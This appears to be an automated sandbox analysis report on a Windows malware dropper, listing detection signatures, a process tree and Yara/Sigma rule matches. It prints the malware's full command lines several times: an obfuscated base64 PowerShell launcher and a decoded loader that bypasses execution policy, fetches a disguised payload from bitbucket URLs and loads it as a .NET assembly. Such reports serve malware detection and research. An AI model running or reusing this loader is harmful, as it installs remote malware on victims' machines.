
Windows Analysis Report
0XVZC3kfwL.exe

Overview

General Information

Sample name:0XVZC3kfwL.exe
renamed because original name is a hash value
Original sample name:278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c.exe
Analysis ID:1524411
MD5:af93d5a246b37ce552356e6b61c9aec9
SHA1:e3f611e2601ff2bad622e2b1ccbdf8626f5cfd47
SHA256:278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c
Tags:104-21-81-233exeuser-JAMESWT_MHT

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Installs new ROOT certificates
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • 0XVZC3kfwL.exe (PID: 3832 cmdline: "C:\Users\user\Desktop\0XVZC3kfwL.exe" MD5: AF93D5A246B37CE552356E6B61C9AEC9)
    • cmd.exe (PID: 2328 cmdline: cmd /c gam.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4640 cmdline: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#H
g#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F
0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • rundll32.exe (PID: 3064 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 4640 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 4640 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
    • 0x14cd0f:$b2: ::FromBase64String(
    • 0x17a38a:$b2: ::FromBase64String(
    • 0x14cb20:$b3: ::UTF8.GetString(
    • 0x17a19e:$b3: ::UTF8.GetString(
    • 0xa261a:$s1: -join
    • 0x1662f0:$s1: -join
    • 0x4283b:$s3: reverse
    • 0x4b146:$s3: reverse
    • 0x733ae:$s3: reverse
    • 0x7a003:$s3: reverse
    • 0x7bfea:$s3: reverse
    • 0x87019:$s3: reverse
    • 0xce87d:$s3: reverse
    • 0xda0bb:$s3: reverse
    • 0xe8dbf:$s3: reverse
    • 0xe90ad:$s3: reverse
    • 0xe97c7:$s3: reverse
    • 0xe9f80:$s3: reverse
    • 0xf106b:$s3: reverse
    • 0xf1485:$s3: reverse
    • 0xf200d:$s3: reverse
Process Memory Space: powershell.exe PID: 6592 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 6592 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
      • 0x33c3:$b2: ::FromBase64String(
      • 0x77cc8:$b2: ::FromBase64String(
      • 0xa3e34:$b2: ::FromBase64String(
      • 0xc38ac:$b2: ::FromBase64String(
      • 0xc42f1:$b2: ::FromBase64String(
      • 0xd6772:$b2: ::FromBase64String(
      • 0xfd28c:$b2: ::FromBase64String(
      • 0x1b046b:$b2: ::FromBase64String(
      • 0x24b527:$b2: ::FromBase64String(
      • 0x31d4:$b3: ::UTF8.GetString(
      • 0x77ad9:$b3: ::UTF8.GetString(
      • 0xa3c45:$b3: ::UTF8.GetString(
      • 0xc36bd:$b3: ::UTF8.GetString(
      • 0xc4102:$b3: ::UTF8.GetString(
      • 0xd6583:$b3: ::UTF8.GetString(
      • 0xfd09d:$b3: ::UTF8.GetString(
      • 0x1b027c:$b3: ::UTF8.GetString(
      • 0x24b338:$b3: ::UTF8.GetString(
      • 0x17b36:$s1: -join
      • 0x24c0b:$s1: -join
      • 0x27fdd:$s1: -join
Source | Rule | Description | Author | Strings
amsi64_6592.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

        Spreading

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { 
return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#B
u#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links 
-Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU